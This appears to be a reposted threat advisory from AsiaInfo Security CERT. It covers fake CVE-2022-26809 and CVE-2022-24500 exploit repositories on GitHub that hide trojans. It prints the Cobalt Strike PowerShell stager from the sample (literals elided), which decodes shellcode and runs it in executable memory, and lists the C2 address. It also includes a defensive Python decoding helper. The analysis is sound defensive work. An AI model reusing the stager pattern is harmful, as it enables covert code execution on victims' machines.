17zwd website source code sharing, website source code station


On 19 May 2022, AsiaInfo Security CERT monitoring found that the GitHub account rkxxz had published projects for CVE-2022-26809 and CVE-2022-24500, described as "CVE-2022-26809 RCE Exploit Remote Code Execution" and "CVE-2022-24500 RCE Exploit SMB Remote Code Execution Vulnerability". Analysis by AsiaInfo Security CERT experts found that several of this user's projects contain trojan files. AsiaInfo Security CERT advises everyone to take precautions and not to download or run any project files from this user (rkxxz)!

As of the publication of this advisory, AsiaInfo Security CERT has tracked and analysed the event and has not yet found the author promoting it on any major forum. We expect the next wave may be promotion of these repositories on major forums; AsiaInfo Security will continue to monitor developments.

Given the recent frequency of security incidents, with similar phishing and watering-hole attacks emerging constantly, AsiaInfo Security CERT reminds everyone to security-check files of unknown origin, so that a careless action does not cause losses to individuals or enterprises.

Event analysis

I. Background

On 19 May 2022, AsiaInfo Security CERT monitoring found that the GitHub account rkxxz had created a CVE-2022-26809 project; security experts analysed the project's contents.

II. Analysis process

1. Basic information about the target

Source (string literals and the encoded command-line blob were not preserved on the page and are shown as …):

```powershell
powershell -nop -w hidden -… "…"

$DoIt = @'
# Resolve an export of a loaded module by reflecting on UnsafeNativeMethods
function func_get_proc_address {
    Param ($var_module, $var_procedure)
    $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('…')[-1].Equals('…') }).GetType('…')
    $var_gpa = $var_unsafe_native_methods.GetMethod('…', [Type[]] @('…', '…'))
    return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('…')).Invoke($null, @($var_module)))), $var_procedure))
}

# Build a delegate type at runtime so an unmanaged function pointer can be called
function func_get_delegate_type {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
        [Parameter(Position = 1)] [Type] $var_return_type = [Void]
    )
    $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('…')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('…', $false).DefineType('…', '…', [System.MulticastDelegate])
    $var_type_builder.DefineConstructor('…', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('…')
    $var_type_builder.DefineMethod('…', '…', $var_return_type, $var_parameters).SetImplementationFlags('…')
    return $var_type_builder.CreateType()
}

# Base64-encoded stage, XOR-obfuscated with the single byte 35 (0x23)
[Byte[]] $var_code = [System.Convert]::FromBase64String('…')
for ($x = 0; $x -lt $var_code.Count; $x++) {
    $var_code[$x] = $var_code[$x] -bxor 35
}

# VirtualAlloc(NULL, len, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE), copy, then call
$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.Length)
$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

# Run the stage in a 32-bit job when the host process is 64-bit
If ([IntPtr]::size -eq 8) {
    start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
    IEX $DoIt
}
```

This is identified as the default Cobalt Strike (CS) PowerShell stager template: base64-decode the payload and XOR each byte with 0x23 to recover the original shellcode.

Raw shellcode (figure)

This yields the C2 server 45.197.132[.]72, which concludes the sample analysis.
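The decoding step described above, written as a small Python triage helper; this is an added example and not part of the AsiaInfo advisory. It pulls the `FromBase64String('…')` blob and the `-bxor` key out of stager text, recovers the stage, and lists printable strings (the quickest way to spot a C2 host in decoded shellcode). The embedded stager and its placeholder "shellcode" are constructed for the example (RFC 5737 test address), not the real sample.

```python
import base64
import hashlib
import re

# Constructed sample in the shape of the Cobalt Strike stager on this page; the
# real shellcode is replaced by a harmless, clearly labelled placeholder string.
PLACEHOLDER = b"PLACEHOLDER-SHELLCODE c2=198.51.100[.]7:8899"
SAMPLE_STAGER = (
    "[Byte[]] $var_code = [System.Convert]::FromBase64String('"
    + base64.b64encode(bytes(b ^ 0x23 for b in PLACEHOLDER)).decode()
    + "')\n"
    "for ($x = 0; $x -lt $var_code.Count; $x++) {\n"
    "    $var_code[$x] = $var_code[$x] -bxor 35\n"
    "}\n"
)

B64_RE = re.compile(r"FromBase64String\(\s*'([A-Za-z0-9+/=]+)'\s*\)")
KEY_RE = re.compile(r"-bxor\s*(0x[0-9a-fA-F]+|\d+)")  # decimal (35) or hex (0x23)


def extract_stage(script):
    """Return (decoded_stage_bytes, xor_key) from CS-style PowerShell stager text."""
    b64 = B64_RE.search(script)
    key = KEY_RE.search(script)
    if not b64 or not key:
        raise ValueError("not a recognised base64 + single-byte XOR stager")
    k = int(key.group(1), 0)
    raw = bytes(b ^ k for b in base64.b64decode(b64.group(1)))
    return raw, k


def printable_strings(data, min_len=6):
    """ASCII runs of at least min_len bytes, as a strings(1)-style first look."""
    return [m.decode() for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def triage(script):
    """Summarise the decoded stage: key, size, hash, and candidate strings."""
    raw, key = extract_stage(script)
    return {
        "xor_key": key,
        "length": len(raw),
        "sha256": hashlib.sha256(raw).hexdigest(),
        "strings": printable_strings(raw),
    }


if __name__ == "__main__":
    for name, value in triage(SAMPLE_STAGER).items():
        print(f"{name}: {value}")
```

On a real stager the `strings` list is only a first pass; the C2 address may sit in a config blob or be computed, so follow up with a proper shellcode emulator or debugger.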

III. Attribution analysis

1. C2 server IP associations

A VirusTotal lookup shows a domain association dated 5 January 2020; how closely it is actually related cannot currently be determined.

Asset-mapping platforms such as FOFA and Quake show no historical scan data, so the asset's history cannot be established; it is suspected to be a newly stood-up asset. In parallel, we traced the information from the GitHub upload.

2. GitHub account information

The commit history of the creator, rkxxz, is shown below. The user shows security awareness and uses GitHub's default email address.

The account was created on 19 April.

On 19 May the user published two projects, both containing trojans.

3. C2 asset information

On 45.197.132[.]72, port 20223 is an associated port and 8899 is the beacon check-in port.

4. IOCs

- 45.197.132[.]72

- https://github[.]com/rkxxz


Published by

风君子

Roaming alone, bowing my head to no one; overturning heaven and earth to ease this life.